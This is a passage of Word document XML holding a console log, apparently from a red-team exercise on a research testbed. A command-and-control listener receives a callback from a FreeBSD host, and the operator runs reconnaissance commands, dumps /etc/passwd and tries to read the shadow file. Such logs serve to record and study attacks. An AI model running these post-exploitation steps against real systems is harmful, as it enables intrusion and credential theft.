    <w:p w14:paraId="209B27B0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>writing 0x27FC0 (163776) bytes of payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4E6154" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F8BDEB" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root@ta51-pivot-2:~/oc2_cadets# python ocMain.py --http 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499A9126" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Must install flask to use snuggly, ignoring...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF4229" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>projects/build_drakon.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4959F330" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Default interface: 0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD35F8B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Listening for connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A050893" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0.0.0.0:80    [HTTP]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E26C844" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDC2E0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3689F40D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## New connection received ##################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564670B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] [freebsd] [x64] [N/A] [N/A]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D20668" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] Initializing new freebsd console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4CB5D3" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ################## NEW CONSOLE READY [F1] ####################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE824AA" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D34C65" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:26</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2526B933" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599BB2B1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 45s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45230FFC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;con F1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D290EA9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B245A9C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] uid: 80 www</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB4FE32" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668890BD" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ta1-cadets-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202594EE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CCF2203" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158A5BC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;pwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DACC35" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D8B57E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B76B00" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] ls failed with status 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F90E31A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="646518E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157992E4" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;getpid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404EC0C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] pid: 29481</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE0838A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F2336A6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;cd etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F45F56" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;cat passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFA48C6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] # $FreeBSD$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6A84D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513359AE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>root:*:0:0:Charlie &amp;:/root:/bin/csh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A043B88" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>toor:*:0:0:Bourne-again Superuser:/root:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CA9A5" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B50599" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>operator:*:2:5:System &amp;:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A46C37" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D84535" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE3EA2E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249BBE27" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DAB709" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>news:*:8:8:News Subsystem:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AC9815" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22531FDE" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FA5100" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43026689" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E246112" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACDE6E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DE1B92" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D48250" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097FB78" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11972495" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E631083" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697D6E1E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF670E9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08563F5D" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ntpd:*:123:123:NTP Daemon:/var/db/ntp:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC98668" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213649C1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB84243" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2D350" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>darpa:*:1001:1001:DARPA:/home/darpa:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38018F23" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>bbn:*:1002:1002:bbn:/home/bbn:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDCFAD9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E901518" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288637C0" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4015884F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B0416" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>polkitd:*:565:565:Polkit Daemon User:/var/empty:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48787B1C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>colord:*:970:970:colord color management daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117C713" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>git_daemon:*:964:964:git daemon:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CFEF1" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>kafka:*:234:234:Apache Kafka user:/nonexistent:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770D319F" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5035AB4E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>pgsql:*:70:70:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F9A3A2" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta3:*:1003:1003:TA3 User,None,None,None:/home/ta3:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45073E97" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ta1:*:1004:1004:TA1 User,None,None,None:/home/ta1:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8FE4C" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin:*:1005:1005:Admin,None,None,None:/home/admin:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0840827A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>user:*:1006:1006:User,None,None,None:/home/user:/usr/local/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDA4622" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>iswitcher:*:1007:1007:Internet Switcher Service,None,None,None:/home/iswitcher:/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C14897" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770A9235" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97F4C9" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;cat shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F96B4D6" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[*] cat failed with status 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A44C4A" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210F5E7E" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A8D6AC" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>F1&gt;main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19406897" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAIN&gt;list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9361B" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        F1         128.55.12.75:34919 --&gt;   128.55.12.233:80    [HTTP]  Fri May 17 10:25:19 2019        active 1320s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319D8E10" w14:textId="77777777" w:rsidR="005A0BE6" w:rsidRDefault="005A0BE6" w:rsidP="005A0BE6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="213" w:name="_egl8pi9ae3wv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="213"/>
